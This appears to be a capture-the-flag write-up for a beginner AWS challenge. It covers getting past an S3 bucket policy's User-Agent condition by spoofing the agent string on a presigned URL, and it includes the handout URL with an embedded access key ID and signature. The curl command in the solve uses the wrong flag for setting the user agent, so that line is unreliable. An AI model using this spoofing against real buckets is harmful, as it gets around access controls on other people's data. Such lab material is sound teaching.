- Category: none
- Difficulty: beginner
- Author: gyrospectre
In this challenge, CI/CD pipelines and Terraform are being used to manage AWS resources. Part of this infrastructure utilises an S3 bucket, which is used to stage files and configuration. Being security conscious individuals, the admins have prevented misuse of this bucket by configuring access only to Terraform. They are also using S3 presigned URLs to provide timeboxed access to certain files without sharing credentials.
Given a presigned URL for flag.txt (generated by the CI/CD pipeline user), and the resource policy applied to the S3 bucket, find a way to get at the flag!
If you need a primer on some of the AWS concepts at play here:
- https://docs.aws.amazon.com/AmazonS3/latest/userguide/ShareObjectPreSignedURL.html
- https://docs.aws.amazon.com/AmazonS3/latest/userguide/example-bucket-policies.html
- https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_evaluation-logic.html#policy-eval-basics-id-rdp
Handout files
- s3_presigned_url.txt
https://kickme-95f596ff5b61453187fbc1c9faa3052e.s3.us-east-1.amazonaws.com/flag.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAXC42U7VJ7MRP6INU%2F20250715%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250715T124755Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=6cefb6299d55fb9e2f97e8d34a64ad8243cdb833e7bdf92fc031d57e96818d9b
- s3_resource_policy.txt
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "s3:GetObject",
"Resource": [
"arn:aws:s3:::kickme-95f596ff5b61453187fbc1c9faa3052e/flag.txt",
"arn:aws:s3:::kickme-95f596ff5b61453187fbc1c9faa3052e"
],
"Principal": {
"AWS": "arn:aws:iam::487266254163:user/pipeline"
},
"Condition": {
"StringLike": {
"aws:UserAgent": "aws-sdk-go*"
}
}
}
]
}
Solve
- The resource policy allows access with a User Agent matching
aws-sdk-go* - To get the flag through s3:GetObject, I used the presigned url and
curl -a "aws-sdk-go*" "s3_presigned_url"to set the correct user agent and retrieve flag.txt.